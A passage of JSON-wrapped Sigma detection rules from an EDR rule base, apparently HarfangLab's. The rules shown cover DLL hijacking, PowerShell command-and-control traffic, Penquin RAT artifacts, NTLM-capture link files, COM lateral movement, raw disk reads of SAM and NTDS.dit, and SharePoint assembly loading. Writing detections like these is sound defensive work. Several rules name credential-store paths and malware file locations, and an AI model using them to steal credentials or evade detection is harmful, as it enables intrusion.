'\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e009fca-fb86-4253-b33b-b0f0f1ae7ba3",
"rule_name": "DLL Hijacking via POWERPNT.exe",
"rule_description": "Detects potential Windows DLL Hijacking via POWERPNT.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e5d7140-3063-49df-b46f-193f1764383c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622677Z",
"creation_date": "2026-03-23T11:45:34.622679Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622684Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1071/001/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1571_powershell_url_uncommon_port.yml",
"content": "title: PowerShell HTTP Request via an Uncommon Port\nid: 8e5d7140-3063-49df-b46f-193f1764383c\ndescription: |\n Detects PowerShell making a POST HTTP request on an uncommon port.\n Adversaries may use a malicious PowerShell implant that communicates over HTTP to their command and control server.\n It is recommended to investigate the PowerShell command executed by the process and determine the legitimacy of the contacted URL.\nreferences:\n - https://attack.mitre.org/techniques/T1071/001/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/11/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1571\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n ProcessName: 'powershell.exe'\n RequestUrlHost|contains: '.' # host without dot is probably on local network\n RequestUrlVerb: 'POST'\n\n filter_port:\n RequestUrlPort:\n - '80'\n - '443'\n - '8080'\n - '8443'\n - '5985' # winrm http\n - '5986' # winrm https\n\n filter_dest_cidr:\n RequestUrlHost|cidr:\n - '127.0.0.0/8' # RFC1122\n - '192.168.0.0/16' # RFC1918\n - '172.16.0.0/12' # RFC1918\n - '10.0.0.0/8' # RFC1918\n - '169.254.0.0/16' # RFC3927\n - '100.64.0.0/10' # RFC6598\n - '192.0.0.0/24' # RFC5736\n - 'FE80::/10' # RFC4291\n\n exclusion_dest_pattern:\n RequestUrlHost:\n - 'localhost'\n - '*.local'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Puppet Labs\\Puppet\\puppet\\bin\\ruby.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\CyberwatchService.exe'\n - '?:\\Program Files\\NSClient++\\nsclient++.exe'\n - '?:\\Program Files\\NSClient++\\nscp.exe'\n - '?:\\opt\\sensu\\embedded\\bin\\ruby.exe'\n - '?:\\Program Files\\Quest\\KACE\\runkbot.exe'\n - '?:\\Program Files (x86)\\Quest\\KACE\\runkbot.exe'\n - '?:\\Program Files\\Quest\\KACE\\KInventory.exe'\n - '?:\\Program Files (x86)\\Quest\\KACE\\KInventory.exe'\n - '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n - '?:\\Program Files\\Observ\\bin\\telegraf.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Windows\\System32\\CompatTelRunner.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files\\ESET\\ESET Security\\ekrn.exe'\n - '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n exclusion_manageengine:\n RequestUrl|contains: '&agentResourceIdentifier='\n UserAgent: 'DesktopCentral Agent'\n\n exclusion_winrm:\n - UserAgent: 'Microsoft WinRM Client'\n RequestUrl|contains: '/Powershell?PSVersion='\n ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - UserAgent: 'Microsoft WinRM Client'\n RequestUrl|contains: '/Powershell?PSVersion='\n ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_wsus:\n RequestUrl|endswith:\n - ':8530/ClientWebService/client.asmx'\n - ':8530/SimpleAuthWebService/SimpleAuth.asmx'\n - ':8530/ReportingWebService/ReportingWebService.asmx'\n - ':8531/ClientWebService/client.asmx'\n - ':8531/SimpleAuthWebService/SimpleAuth.asmx'\n - ':8531/ReportingWebService/ReportingWebService.asmx'\n\n exclusion_exchange:\n ProcessCommandLine|contains: '?:\\Program Files\\Microsoft\\Exchange Server\\V??\\bin\\RemoteExchange.ps1'\n\n exclusion_observ:\n ProcessCommandLine|contains: '?:\\Program Files\\Observ\\bin\\*.ps1'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e5d7140-3063-49df-b46f-193f1764383c",
"rule_name": "PowerShell HTTP Request via an Uncommon Port",
"rule_description": "Detects PowerShell making a POST HTTP request on an uncommon port.\nAdversaries may use a malicious PowerShell implant that communicates over HTTP to their command and control server.\nIt is recommended to investigate the PowerShell command executed by the process and determine the legitimacy of the contacted URL.\n",
"rule_creation_date": "2024-11-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e636923-4f5f-48f2-870d-b76e0ea0e15c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597086Z",
"creation_date": "2026-03-23T11:45:34.597090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597097Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/groups/G0010/",
"https://attack.mitre.org/software/S0587/"
],
"name": "t1105_penquin_turla_suspicious_execution.yml",
"content": "title: Suspicious Execution Related to Penquin\nid: 8e636923-4f5f-48f2-870d-b76e0ea0e15c\ndescription: |\n Detects the execution of files with names linked to the malware Penquin.\n Penquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\n The execution of these files are related to the usage of the \"start\" or \"exec\" command by the C&C server on an infected system.\n This command downloads and executes an arbitrary file provided by the C&C server on the infected host.\n It is recommended to investigate the parent process performing this action.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/groups/G0010/\n - https://attack.mitre.org/software/S0587/\ndate: 2023/01/11\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1105\n - attack.g0010\n - attack.s0587\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.ThreatActor.Turla\n - classification.Linux.Malware.Penquin\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - Image:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n - CommandLine|contains:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e636923-4f5f-48f2-870d-b76e0ea0e15c",
"rule_name": "Suspicious Execution Related to Penquin",
"rule_description": "Detects the execution of files with names linked to the malware Penquin.\nPenquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\nThe execution of these files are related to the usage of the \"start\" or \"exec\" command by the C&C server on an infected system.\nThis command downloads and executes an arbitrary file provided by the C&C server on the infected host.\nIt is recommended to investigate the parent process performing this action.\n",
"rule_creation_date": "2023-01-11",
"rule_modified_date": "2025-02-03",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e86e07b-ba70-4981-ad8f-1b5f178d1b2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618627Z",
"creation_date": "2026-03-23T11:45:34.618629Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mdsecactivebreach/Farmer",
"https://github.com/barretgo/ntlm_theft",
"https://attack.mitre.org/techniques/T1557/001/",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_suspicious_link_file.yml",
"content": "title: Potentially Malicious Link File Copied to an SMB Share\nid: 8e86e07b-ba70-4981-ad8f-1b5f178d1b2e\ndescription: |\n Detects the copy/move of a suspicious link file to an SMB share. These files can contain malicious redirections on their icons or other elements to force authentication.\n LLMNR Poisoning attacks occur when malicious actors spoof a legitimate authentication to capture the NTLMv2 hash of an authenticating user.\n Attackers can set up a listener in a machine they control to capture the authentication request made by users browsing to the folders where these files exist, as loading the icon will force an authentication request.\n To investigate this alert, it is recommended to download the link file to see if it contains any malicious redirections in its fields. Preferably through a non-graphical interface or an isolated environment.\n LLMNR Poisoning can also be mitigated by disabling it through a group policy or by enabling SMB signing. However, this is known to make SMB requests ~50% slower.\n Is recommended to analyze both the process responsible for the action and the copied link file to look for malicious content or actions.\nreferences:\n - https://github.com/mdsecactivebreach/Farmer\n - https://github.com/barretgo/ntlm_theft\n - https://attack.mitre.org/techniques/T1557/001/\n - https://attack.mitre.org/software/S0174/\ndate: 2023/05/25\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1557.001\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n # Shell primitive, no image.\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n # It is common to see files starting with symbols, propping them to the top of the share.\n # This is so the user doesn't have to scroll through to browse them.\n CommandLine|endswith:\n - '\\\\\\\\*\\@*.url'\n - '\\\\\\\\*\\@*.lnk'\n - '\\\\\\\\*\\@*.ico'\n - '\\\\\\\\*\\#*.url'\n - '\\\\\\\\*\\#*.lnk'\n - '\\\\\\\\*\\#*.ico'\n - '\\\\\\\\*\\!*.url'\n - '\\\\\\\\*\\!*.lnk'\n - '\\\\\\\\*\\!*.ico'\n - '\\\\\\\\*\\0*.url'\n - '\\\\\\\\*\\0*.lnk'\n - '\\\\\\\\*\\0*.ico'\n\n condition: (selection_bin or selection_cmdline) and selection_smb_share\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e86e07b-ba70-4981-ad8f-1b5f178d1b2e",
"rule_name": "Potentially Malicious Link File Copied to an SMB Share",
"rule_description": "Detects the copy/move of a suspicious link file to an SMB share. These files can contain malicious redirections on their icons or other elements to force authentication.\nLLMNR Poisoning attacks occur when malicious actors spoof a legitimate authentication to capture the NTLMv2 hash of an authenticating user.\nAttackers can set up a listener in a machine they control to capture the authentication request made by users browsing to the folders where these files exist, as loading the icon will force an authentication request.\nTo investigate this alert, it is recommended to download the link file to see if it contains any malicious redirections in its fields. Preferably through a non-graphical interface or an isolated environment.\nLLMNR Poisoning can also be mitigated by disabling it through a group policy or by enabling SMB signing. However, this is known to make SMB requests ~50% slower.\nIs recommended to analyze both the process responsible for the action and the copied link file to look for malicious content or actions.\n",
"rule_creation_date": "2023-05-25",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1557.001",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e9c7e02-4778-4c05-9023-5515bbbb98a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626451Z",
"creation_date": "2026-03-23T11:45:34.626452Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626457Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/lateral-movement-via-dcom-abusing-control-panel/118232/",
"https://github.com/klsecservices/CPLDCOMTrigger",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_cpl_lateral_movement_com.yml",
"content": "title: Control Panel Lateral Movement via COM\nid: 8e9c7e02-4778-4c05-9023-5515bbbb98a8\ndescription: |\n Detects a control panel entry being installed remotely in the Windows registry.\n Threat actors can remotely drop a malicious DLL, register it as a new control panel item, and then trigger its execution through the COpenControlPanel COM interface.\n It is recommended to audit the newly added CPL file created in \"C:\\Windows\\System32\" and investigate the source IP of the remote session for signs of malicious activity.\nreferences:\n - https://securelist.com/lateral-movement-via-dcom-abusing-control-panel/118232/\n - https://github.com/klsecservices/CPLDCOMTrigger\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2025/12/22\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry_cpl:\n EventType: CreateKey\n TargetObject|startswith:\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n\n selection_remote:\n - SessionLogonType: 3\n - ProcessSessionLogonType: 3\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e9c7e02-4778-4c05-9023-5515bbbb98a8",
"rule_name": "Control Panel Lateral Movement via COM",
"rule_description": "Detects a control panel entry being installed remotely in the Windows registry.\nThreat actors can remotely drop a malicious DLL, register it as a new control panel item, and then trigger its execution through the COpenControlPanel COM interface.\nIt is recommended to audit the newly added CPL file created in \"C:\\Windows\\System32\" and investigate the source IP of the remote session for signs of malicious activity.\n",
"rule_creation_date": "2025-12-22",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ea00c00-8d43-40e6-823a-15ebf355f8da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625954Z",
"creation_date": "2026-03-23T11:45:34.625963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625967Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mallo-m/AxiomSecrets",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_raw_device_access_sensitive_files.yml",
"content": "title: Raw Device Access to Sensitive Files\nid: 8ea00c00-8d43-40e6-823a-15ebf355f8da\ndescription: |\n Detects a raw device access to sensitive files.\n Accessing raw devices is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\n This kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\n If abused, it can lead to privilege escalation, credential theft, or complete system compromise.\n It is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\nreferences:\n - https://github.com/mallo-m/AxiomSecrets\n - https://attack.mitre.org/techniques/T1006/\ndate: 2025/11/21\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.RawDeviceAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: raw_device_access\ndetection:\n selection:\n ProcessCommandLine|contains:\n - '?:\\Windows\\System32\\config\\SAM'\n - '?:\\Windows\\System32\\config\\SYSTEM'\n - '?:\\Windows\\System32\\config\\SECURITY'\n - '?:\\Windows\\NTDS\\ntds.dit'\n\n exclusion_systemprofile:\n ProcessCommandLine|contains:\n - '?:\\WINDOWS\\System32\\config\\systemprofile'\n - '?:\\Windows\\System32\\config\\SYSTEM~1\\'\n\n exclusion_siemens:\n ProcessCommandLine|contains:\n - '?:\\Windows\\system32\\reg.exe LOAD HKLM\\TempVMHost ?:\\Windows\\system32\\config\\System'\n - '?:\\Windows\\system32\\reg.exe LOAD HKLM\\TempChainedVMHost ?:\\Windows\\system32\\config\\System'\n ProcessCurrentDirectory|startswith: '?:\\sysmgmt\\sd_store\\'\n\n exclusion_swsetup:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\cacls.exe ?:\\WINDOWS\\system32\\config\\system'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ea00c00-8d43-40e6-823a-15ebf355f8da",
"rule_name": "Raw Device Access to Sensitive Files",
"rule_description": "Detects a raw device access to sensitive files.\nAccessing raw devices is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\nThis kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\nIf abused, it can lead to privilege escalation, credential theft, or complete system compromise.\nIt is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ea99f0f-186c-4987-97e7-36e73dd41eea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079496Z",
"creation_date": "2026-03-23T11:45:34.079498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1620_suspicious_dotnet_sharepoint.yml",
"content": "title: Suspicious Dotnet Assembly Loaded by Sharepoint Server\nid: 8ea99f0f-186c-4987-97e7-36e73dd41eea\ndescription: |\n Detects the loading suspicious a Dotnet library by Sharepoint Server.\n Attackers may dynamically load assemblies in Sharepoint to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/08/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_sharepoint:\n - ProcessCommandLine|contains: 'sharepoint'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'sharepoint'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n exclusion_xoml:\n FullyQualifiedAssemblyName: 'Xoml.*, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ea99f0f-186c-4987-97e7-36e73dd41eea",
"rule_name": "Suspicious Dotnet Assembly Loaded by Sharepoint Server",
"rule_description": "Detects the loading suspicious a Dotnet library by Sharepoint Server.\nAttackers may dynamically load assemblies in Sharepoint to stealthily execute further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n",
"rule_creation_date": "2025-07-25",
"rule_modified_date": "2025-08-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f01bb75-5129-4ec1-bf05-a350afd2e6f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628562Z",
"creation_date": "2026-03-23T11:45:34.628564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628568Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_sensitive_process.yml",
